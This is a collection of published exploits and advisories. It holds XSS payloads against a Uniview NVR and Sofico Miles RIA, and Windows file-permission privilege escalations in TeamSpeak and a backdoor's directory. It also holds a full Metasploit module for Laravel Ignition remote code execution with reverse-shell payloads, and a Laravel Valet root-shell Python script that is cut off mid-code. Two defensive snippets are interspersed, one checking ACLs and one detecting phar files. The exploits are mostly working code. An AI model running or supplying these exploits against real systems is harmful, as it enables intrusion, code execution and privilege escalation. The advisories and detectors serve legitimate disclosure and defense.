<pre><code># Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)<br /># Author: Luis Martinez<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features<br /># Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568<br /># Tested Version: NVR304-16EP<br /># Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr<br /># Vulnerability Type: Reflected Cross-Site Scripting (XSS)<br /># CVE: N/A<br /><br /># Proof of Concept:<br /><br />http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8c9e7906d0ad5d0f2267be0057f2a8e3.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Mechbot.a<br />Vulnerability: Insecure Permissions<br />Description: The malware creates a dir with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 8c9e7906d0ad5d0f2267be0057f2a8e3<br />Vuln ID: MVID-2021-0417<br />Disclosure: 12/11/2021<br /><br /><br />Exploit/PoC:<br />C:\>cacls "TitanZone BOT"<br />C:\TitanZone BOT BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>dir "TitanZone BOT"<br /> Volume in drive C has no label.<br /><br /> Directory of C:\TitanZone BOT<br /><br />06/15/2003 11:24 AM 591 checkmech<br />06/15/2003 11:24 AM 21,854 configure<br />11/19/2021 12:13 AM DIR CONTRIB<br />05/10/2003 02:07 PM 201,216 CYGWIN1.DLL<br />05/10/2003 02:07 PM 4,305 GENUSER<br />07/02/2003 08:44 PM 35 LinkEvents<br />06/15/2003 11:24 AM 1,391 Makefile<br />05/10/2003 02:07 PM 22,882 mech.help<br />07/02/2003 08:40 PM 6 MECH.PID<br />07/02/2003 08:45 PM 2,464 MECH.SET<br />05/10/2003 02:07 PM 796 MKINDEX<br />11/19/2021 12:13 AM DIR randfiles<br />11/19/2021 12:13 AM DIR SRC<br />06/26/2003 09:09 PM 213 titanzone.bat<br />11/19/2021 12:13 AM DIR TOOLS<br />05/10/2003 02:07 PM 192,512 WinMech.exe<br />07/02/2003 08:45 PM 155 winmech.users<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions<br /># Date: 2022-02-15<br /># Exploit Author: Aryan Chehreghani<br /># Contact: aryanchehreghani@yahoo.com<br /># Vendor Homepage: https://www.teamspeak.com<br /># Software Link: https://www.teamspeak.com/en/downloads<br /># Version: 3.5.6 <br /># Tested on: Windows 10 x64<br /><br /># [ About - TeamSpeak ]:<br />#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),<br />#application for audio communication between users on a chat channel,<br />#much like a telephone conference call, Users typically use headphones with a microphone,<br />#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,<br />#The target audience for TeamSpeak is gamers, who can use the software to communicate,<br />#with other players on the same team of a multiplayer video game,<br />#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.<br /><br /># [ Description ]:<br />#The TeamSpeak Application was installed with insecure file permissions.<br />#It was found that all folder and file permissions were incorrectly configured during installation.<br />#It was possible to replace the service binary. 
<br /><br /># [ POC ]:<br /><br />C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe<br /><br />createfileassoc.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />error_report.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />package_inst.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />Uninstall.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />update.exe NT AUTHORITY\SYSTEM:(F)<br /> BUILTIN\Administrators:(F)<br /> WIN-FREMP1UB3LB\Administrator:(F)<br /><br />Successfully processed 7 files; Failed processing 0 files<br /><br /># [ Exploit - Privilege Escalation ]:<br />#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...<br />#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)<br /><br /></code></pre>
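Both permission findings above (the malware directory that grants Authenticated Users change rights, and the TeamSpeak binaries) come down to reading cacls/icacls output for write-class ACEs held by low-privilege principals. The following is an added example, not code from either advisory: it parses both output formats and reports such entries. The cacls sample is copied from the Malvuln advisory; the icacls sample is constructed, and `example_helper.exe` is a made-up file name.

```python
"""Flag ACL entries that let low-privilege principals modify a file or directory.

Parses the text printed by cacls (rights letter after the flags, e.g. (ID)C)
and icacls (rights inside parentheses, e.g. (I)(M)) and reports write-class
rights granted to groups every logged-on user belongs to.
"""
import re

# Principals that any interactive or authenticated user is a member of.
LOW_PRIV = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}
# Simple rights (cacls F/C/W, icacls F/M/W) plus specific rights that allow modification.
WRITE_RIGHTS = {"F", "C", "M", "W", "GA", "GW", "WD", "AD", "WA", "WEA",
                "DE", "DC", "WDAC", "WO"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I", "ID"}

ACE_RE = re.compile(
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|APPLICATION PACKAGE AUTHORITY|[^\s\\:]+)\\[^\\:]+"
    r"|CREATOR OWNER|Everyone)"
    r":(?P<ace>(?:\([A-Z,]+\))*[A-Z]*)\s*$"
)


def parse_acl_output(text):
    """Yield (object, principal, flags, rights) for every ACE line in cacls/icacls output."""
    current = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        head = line[:m.start()].strip()
        if head:  # the first line of a block names the file or directory
            current = head
        flags, rights = set(), set()
        for token in re.findall(r"\(([A-Z,]+)\)", m.group("ace")):
            for part in token.split(","):
                (flags if part in INHERIT_FLAGS else rights).add(part)
        # cacls prints the rights letter (F/C/W/R/N) outside the parentheses
        trailing = re.sub(r"\([A-Z,]+\)", "", m.group("ace"))
        rights.update(trailing)
        yield current, m.group("principal"), flags, rights


def find_weak_entries(text):
    """Return ACEs that give a low-privilege principal write-class rights."""
    findings = []
    for obj, principal, flags, rights in parse_acl_output(text):
        if principal.lower() in LOW_PRIV and rights & WRITE_RIGHTS:
            findings.append({
                "object": obj,
                "principal": principal,
                "rights": sorted(rights & WRITE_RIGHTS),
                "inherit_only": "IO" in flags,  # applies to children, not the object itself
            })
    return findings


# Copied from the Malvuln advisory (cacls format).
CACLS_SAMPLE = r"""
C:\TitanZone BOT BUILTIN\Administrators:(OI)(CI)(ID)F
                 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                 BUILTIN\Users:(OI)(CI)(ID)R
                 NT AUTHORITY\Authenticated Users:(ID)C
                 NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
"""

# Constructed icacls output: one binary is locked down, the other (made-up name)
# is modifiable by every member of Users.
ICACLS_SAMPLE = r"""
ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)
example_helper.exe NT AUTHORITY\SYSTEM:(F)
                   BUILTIN\Administrators:(F)
                   BUILTIN\Users:(I)(M)

Successfully processed 2 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for name, sample in (("cacls", CACLS_SAMPLE), ("icacls", ICACLS_SAMPLE)):
        for f in find_weak_entries(sample):
            suffix = " [inherit-only]" if f["inherit_only"] else ""
            print(f"{name}: {f['object']!r}: {f['principal']} can modify "
                  f"({','.join(f['rights'])}){suffix}")
```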
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211213-1 ><br />=======================================================================<br /> title: Stored Cross Site Scripting<br /> product: Sofico Miles RIA<br /> vulnerable version: 2020.2 build 127964T<br /> fixed version: 2020.2 build 128076 or higher<br /> CVE number: CVE-2021-41557<br /> impact: Medium<br /> homepage: https://www.sofico.global<br /> found: 2021-07-09<br /> by: Oualid Lkhaouni (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Sofico is the world’s leading supplier of mission-critical software solutions<br />for automotive finance, leasing, fleet, and mobility management companies,<br />and its software is used by a broad range of renowned leasing companies<br />all over the world."<br /><br />Source: https://www.sofico.global/en/about-sofico<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends updating to the latest version of Sofico Miles RIA.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross Site Scripting (CVE-2021-41557)<br />Miles RIA is a software solution by Sofico that allows leasing companies to manage<br />their leasing services on a single platform.<br /><br />The Miles RIA application is vulnerable to Stored Cross-Site Scripting (XSS).<br />An attacker with access to a user account of the RIA IT or the Fleet role<br />can create a malicious work order in the damage reports section or change<br />existing work orders 
with malicious JavaScript.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross Site Scripting (CVE-2021-41557)<br />The following payload can be used for the insecure work order number<br />parameter of pending work orders in the damage reports section to inject<br />and execute malicious JavaScript in the context of the victim.<br />Once the victim visits the malicious work order, the attacker-controlled<br />input gets reflected in the lower left context menu of the loaded webpage:<br /><br />1000 <img src=x onerror=alert(document.domain)><br /><br />This JavaScript code will then automatically get executed when the site<br />which contains the payload is visited by the victim.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following software version has been tested and found to be vulnerable:<br />* Miles RIA 2020.2 build 127964T<br /><br />It is unknown whether previous versions are affected, as the vendor did not<br />supply this information.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-26: Contacting vendor through contact.de@sofico.global; No answer.<br />2021-08-24: Contacting vendor through contact.de@sofico.global; No answer.<br />2021-09-21: Contacting vendor through contact.de@sofico.global and contact@sofico.global; No answer.<br />2021-11-04: Informing vendor about public advisory release on 9th November 2021.<br />2021-11-08: Received info from 3rd party about patches.<br />2021-11-24: Informing vendor about public advisory release on 29th November 2021.<br />2021-11-24: Received more detailed info from 3rd party about patches.<br />2021-12-01: Coordination call with vendor.<br />2021-12-13: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides patches for the affected product versions:<br />* Miles RIA 2020.2 build 128076 or higher<br /><br /><br />Workaround:<br />-----------<br 
/>None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Oualid Lkhaouni / @2021<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Unauthenticated remote code execution in Ignition',<br /> 'Description' => %q{<br /> Ignition before 2.5.2, as used in Laravel and other products,<br /> allows unauthenticated remote attackers to execute arbitrary code<br /> because of insecure usage of file_get_contents() and file_put_contents().<br /> This is exploitable on sites using debug mode with Laravel before 8.4.2.<br /> },<br /> 'Author' => [<br /> 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging<br /> 'ambionics' # discovered<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2021-3129'],<br /> ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']<br /> ],<br /> 'DisclosureDate' => '2021-01-13',<br /> 'Platform' => %w[unix linux macos win],<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }<br /> }<br /> ],<br /> [<br /> 'Windows (In-Memory)',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }<br /> }<br /> ]<br /> ],<br /> 'Privileged' => false,<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Ignition execute solution path', 
'/_ignition/execute-solution']),<br /> OptString.new('LOGFILE', [false, 'Laravel log file absolute path'])<br /> ])<br /> end<br /><br /> def check<br /> print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path.to_s),<br /> 'method' => 'PUT'<br /> }, 1)<br /> # Check whether it is using facade/ignition<br /> # If is using it should respond method not allowed<br /> # checking if debug mode is enable<br /> if res && res.code == 405 && res.body.match(/label:"(Debug)"/)<br /> vprint_status 'Debug mode is enabled.'<br /> # check version<br /> versions = JSON.parse(<br /> res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}')<br /> )<br /> version = Rex::Version.new(versions['framework_version'])<br /> vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"<br /> # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid)<br /> # but it is way more intrusive than just checking the version moreover we would need to call<br /> # the find_log_file method before, meaning four requests more.<br /> return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')<br /> end<br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def exploit<br /> @logfile = datastore['LOGFILE'] || find_log_file<br /> fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile<br /><br /> clear_log<br /> put_payload<br /> convert_to_phar<br /> run_phar<br /><br /> handler<br /><br /> clear_log<br /> end<br /><br /> def find_log_file<br /> vprint_status 'Trying to detect log file'<br /> res = post Rex::Text.rand_text_alpha_upper(12)<br /> if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?})<br /> logpath = Regexp.last_match(1).gsub(/\\/, '')<br /> vprint_status "Found directory candidate 
#{logpath}"<br /> logfile = "#{logpath}/storage/logs/laravel.log"<br /> vprint_status "Checking if #{logfile} exists"<br /> res = post logfile<br /> if res.code == 200<br /> vprint_status "Found log file #{logfile}"<br /> return logfile<br /> end<br /> vprint_error "Log file does not exist #{logfile}"<br /> return<br /> end<br /> vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'<br /> return<br /> end<br /><br /> def clear_log<br /> res = post "php://filter/read=consumed/resource=#{@logfile}"<br /> # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)<br /> fail_with(Failure::UnexpectedReply, "Log file #{@logfile} doesn't seem to exist.") unless res.code == 200<br /> end<br /><br /> def put_payload<br /> post format_payload<br /> post Rex::Text.rand_text_alpha_upper(2)<br /> end<br /><br /> def convert_to_phar<br /> filters = %w[<br /> convert.quoted-printable-decode<br /> convert.iconv.utf-16le.utf-8<br /> convert.base64-decode<br /> ].join('|')<br /><br /> post "php://filter/write=#{filters}/resource=#{@logfile}"<br /> end<br /><br /> def run_phar<br /> post "phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt"<br /> # resp.body.match(%r{^(.*)\n<!doctype html>})<br /> # $1 ? 
print_good($1) : nil<br /> end<br /><br /> def body_template(data)<br /> {<br /> solution: 'Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution',<br /> parameters: {<br /> viewFile: data,<br /> variableName: Rex::Text.rand_text_alpha_lower(4..12)<br /> }<br /> }.to_json<br /> end<br /><br /> def post(data)<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path.to_s),<br /> 'method' => 'POST',<br /> 'data' => body_template(data),<br /> 'ctype' => 'application/json',<br /> 'headers' => {<br /> 'Accept' => '*/*',<br /> 'Accept-Encoding' => 'gzip, deflate'<br /> }<br /> })<br /> end<br /><br /> def generate_phar(pop)<br /> file = Rex::Text.rand_text_alpha_lower(8)<br /> stub = "<?php __HALT_COMPILER(); ?>\r\n"<br /> file_contents = Rex::Text.rand_text_alpha_lower(20)<br /> file_crc32 = Zlib.crc32(file_contents) & 0xffffffff<br /> manifest_len = 40 + pop.length + file.length<br /> phar = stub<br /> phar << [manifest_len].pack('V') # length of manifest in bytes<br /> phar << [0x1].pack('V') # number of files in the phar<br /> phar << [0x11].pack('v') # api version of the phar manifest<br /> phar << [0x10000].pack('V') # global phar bitmapped flags<br /> phar << [0x0].pack('V') # length of phar alias<br /> phar << [pop.length].pack('V') # length of phar metadata<br /> phar << pop # pop chain<br /> phar << [file.length].pack('V') # length of filename in the archive<br /> phar << file # filename<br /> phar << [file_contents.length].pack('V') # length of the uncompressed file contents<br /> phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970.<br /> phar << [file_contents.length].pack('V') # length of the compressed file contents<br /> phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents<br /> phar << [0x1b6].pack('V') # bit-mapped file-specific flags<br /> phar << [0x0].pack('V') # serialized File Meta-data length<br /> phar << file_contents # serialized File Meta-data<br /> phar << 
[Rex::Text.sha1(phar)].pack('H*') # signature<br /> phar << [0x2].pack('V') # signature type<br /> phar << 'GBMB' # signature presence<br /><br /> return phar<br /> end<br /><br /> def format_payload<br /> # rubocop:disable Style/StringLiterals<br /> serialize = "a:2:{i:7;O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\""<br /> serialize << ":1:{S:41:\"\\00GuzzleHttp\\5cCookie\\5cFileCookieJar\\00filename\";"<br /> serialize << "O:38:\"Illuminate\\Validation\\Rules\\RequiredIf\""<br /> serialize << ":1:{S:9:\"condition\";a:2:{i:0;O:20:\"PhpOption\\LazyOption\""<br /> serialize << ":2:{S:30:\"\\00PhpOption\\5cLazyOption\\00callback\";"<br /> serialize << "S:6:\"system\";S:31:\"\\00PhpOption\\5cLazyOption\\00arguments\";"<br /> serialize << "a:1:{i:0;S:#{payload.encoded.length}:\"#{payload.encoded}\";}}i:1;S:3:\"get\";}}}i:7;i:7;}"<br /> # rubocop:enable Style/StringLiterals<br /> phar = generate_phar(serialize)<br /><br /> b64_gadget = Base64.strict_encode64(phar).gsub('=', '')<br /> payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join<br /><br /> return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00'<br /> end<br /><br />end<br /></code></pre>
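The module above rewrites laravel.log in place through php://filter until the log is a phar archive whose manifest metadata is unserialized on any phar:// access. A phar always ends with a digest, a 4-byte signature type and the bytes GBMB, so a log file carrying a valid trailer is a concrete indicator of that technique. The following is an added example, not the module's or ambionics' code: it checks a byte string for that trailer, recomputes the digest, and reads the archive-level metadata length from the manifest header. `build_sample_phar` is a constructed fixture following the same field layout as the module's `generate_phar`, with a harmless serialized string as metadata.

```python
"""Detect a phar signature trailer in data that should be a plain text file."""
import hashlib
import struct
import zlib

HALT = b"__HALT_COMPILER(); ?>"
# signature type flag -> (name, hash constructor, digest length)
SIG_ALGOS = {
    0x0001: ("MD5", hashlib.md5, 16),
    0x0002: ("SHA1", hashlib.sha1, 20),
    0x0004: ("SHA256", hashlib.sha256, 32),
    0x0008: ("SHA512", hashlib.sha512, 64),
}


def manifest_metadata_len(body: bytes):
    """Length of the archive-level metadata, read from the manifest header after the stub."""
    pos = body.find(HALT)
    if pos < 0:
        return None
    pos += len(HALT)
    for nl in (b"\r\n", b"\n"):  # PHP permits one newline after the closing tag
        if body.startswith(nl, pos):
            pos += len(nl)
            break
    if len(body) < pos + 18:
        return None
    # <manifest_len><num_files><api_version><flags><alias_len>, all little-endian
    _mlen, _nfiles, _api, _flags, alias_len = struct.unpack_from("<IIHII", body, pos)
    pos += 18 + alias_len
    if len(body) < pos + 4:
        return None
    return struct.unpack_from("<I", body, pos)[0]


def phar_signature_info(data: bytes):
    """Return None when data has no phar trailer, otherwise describe it.

    The digest covers every byte before the trailer, so it can be recomputed;
    a valid digest plus non-zero metadata is what a phar:// deserialization
    primitive needs.
    """
    if len(data) < 8 or data[-4:] != b"GBMB":
        return None
    sig_type = struct.unpack("<I", data[-8:-4])[0]
    info = {"sig_type": sig_type, "algorithm": None, "valid": False, "metadata_len": None}
    algo = SIG_ALGOS.get(sig_type)
    if algo is None or len(data) < 8 + algo[2]:  # e.g. OpenSSL signatures: not handled here
        return info
    name, hash_fn, size = algo
    body, sig = data[:-(8 + size)], data[-(8 + size):-8]
    info["algorithm"] = name
    info["valid"] = hash_fn(body).digest() == sig
    info["metadata_len"] = manifest_metadata_len(body)
    return info


def build_sample_phar(metadata: bytes, name: bytes = b"x.txt", contents: bytes = b"hello") -> bytes:
    """Constructed fixture: a one-file phar with archive metadata, SHA1 signed."""
    stub = b"<?php " + HALT + b"\r\n"
    entry = struct.pack("<I", len(name)) + name
    # uncompressed size, timestamp, compressed size, crc32, flags (0644), file metadata length
    entry += struct.pack("<IIIIII", len(contents), 0, len(contents),
                         zlib.crc32(contents) & 0xFFFFFFFF, 0x1B6, 0)
    manifest = struct.pack("<IHII", 1, 0x11, 0x10000, 0)  # files, api, flags, alias length
    manifest += struct.pack("<I", len(metadata)) + metadata + entry
    body = stub + struct.pack("<I", len(manifest)) + manifest + contents
    return body + hashlib.sha1(body).digest() + struct.pack("<I", 0x2) + b"GBMB"


# Constructed log line: what laravel.log should look like.
LOG_SAMPLE = b"[2022-02-15 10:00:00] local.ERROR: constructed log line\n"

if __name__ == "__main__":
    print("log:", phar_signature_info(LOG_SAMPLE))
    print("phar:", phar_signature_info(build_sample_phar(b's:4:"test";')))
```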
<pre><code># Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)<br /># Exploit Author: leonjza<br /># Vendor Homepage: https://laravel.com/docs/8.x/valet<br /># Version: v1.1.4 to v2.0.3<br /><br />#!/usr/bin/env python2<br /><br /># Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS)<br /># February 2017 - @leonjza<br /><br /># Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes.<br /># Reintroduced in v2.0.7 via the 'trust' command again.<br /><br /># This bug got introduced when the sudoers files got added around<br /># commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1].<br /><br /># Effectively, when the valet command is installed, composer will symlink [2]<br /># the `valet` command to /usr/local/bin. This 'command' is writable by the user<br /># that installed it.<br />#<br /># ~ $ ls -lah $(which valet)<br /># lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet<br /><br /># Running `valet install`, will start the install [3] routine. The very first action<br /># taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which<br /># will prompt the user for the sudo password in the command line. From here (and in fact<br /># from any point where the valet tool uses sudo) the command can execute further commands<br /># as root without any further interaction needed by the user.<br /># With this 'sudo' access, the installer does its thing, and eventually installs two new<br /># sudoers rules for homebrew[5] and valet[6].<br /><br /># ~ $ cat /etc/sudoers.d/*<br /># Cmnd_Alias BREW = /usr/local/bin/brew *<br /># %admin ALL=(root) NOPASSWD: BREW<br /># Cmnd_Alias VALET = /usr/local/bin/valet *<br /># %admin ALL=(root) NOPASSWD: VALET<br /><br /># The problem with the sudoers rules now is the fact that a user controlled script<br /># (remember the valet command is writable to my user?) is allowed to be run with<br /># root privileges. 
More conveniently, without a password. So, to trivially privesc<br /># using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D<br /><br /># Or, use this lame script you lazy sod.<br />#<br /># ~ $ sudo -k<br /># ~ $ python escalate.py<br /># * Shell written. Dropping into root shell<br /># bash-3.2# whoami<br /># root<br /># bash-3.2# exit<br /># exit<br /># * Cleaning up POC from valet command<br /><br /># [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40<br /># [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39<br /># [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50<br /># [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133<br /># [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177<br /># [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46<br /><br />import os<br />import subprocess<br /><br />MIN_VERSION = "1.1.4"<br />MAX_VERSION = "2.0.3"<br />POC = "/bin/bash; exit;\n"<br /><br /><br />def run_shit_get_output(shit_to_run):<br /> return subprocess.Popen(shit_to_run, shell=True,<br /> stderr=subprocess.PIPE, stdout=subprocess.PIPE)<br /><br /><br />def version_tuple(v):<br /> return tuple(map(int, (v.split("."))))<br /><br /><br />def get_valet():<br /> p = run_shit_get_output('which valet')<br /> lines = ''.join(p.stdout.readlines())<br /><br /> if 'bin/valet' in lines:<br /> return lines.strip()<br /><br /> return None<br /><br /><br />def get_valet_version(valet_location):<br /> p = run_shit_get_output(valet_location)<br /> v = p.stdout.read(25)<br /><br /> return v.split("\n")[0].split(" ")[2]<br /><br /><br />def can_write_to_valet(valet_location):<br /> return os.access(valet_location, os.W_OK)<br /><br /><br />def cleanup_poc_from_command(command_location):<br /> with open(command_location, 'r') as vc:<br /> command_contents = vc.readlines()<br /><br /> if command_contents[1] == 
POC:<br /> print('* Cleaning up POC from valet command')<br /> command_contents.pop(1)<br /> with open(command_location, 'w') as vc:<br /> vc.write(''.join(command_contents))<br /><br /> return<br /><br /> print('* Could not cleanup the valet command. Check it out manually!')<br /> return<br /><br /><br />def main():<br /> valet_command = get_valet()<br /><br /> if not valet_command:<br /> print(' * The valet command could not be found. Bailing!')<br /> return<br /><br /> # get the content so we can check if we already pwnd it<br /> with open(valet_command, 'r') as vc:<br /> command_contents = vc.readlines()<br /><br /> # check that we havent already popped this thing<br /> if command_contents[1] == POC:<br /> print('* Looks like you already pwnd this. Dropping into shell anyways.')<br /> os.system('sudo ' + valet_command)<br /> cleanup_poc_from_command(valet_command)<br /> return<br /><br /> current_version = get_valet_version(valet_command)<br /><br /> # ensure we have a valid, exploitable version<br /> if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \<br /> or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):<br /> print(' * Valet version {0} does not have this bug!'.format(current_version))<br /> return<br /><br /> # check that we can write<br /> if not can_write_to_valet(valet_command):<br /> print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))<br /> return<br /><br /> # drop the poc line and write the new one<br /> command_contents.insert(1, POC)<br 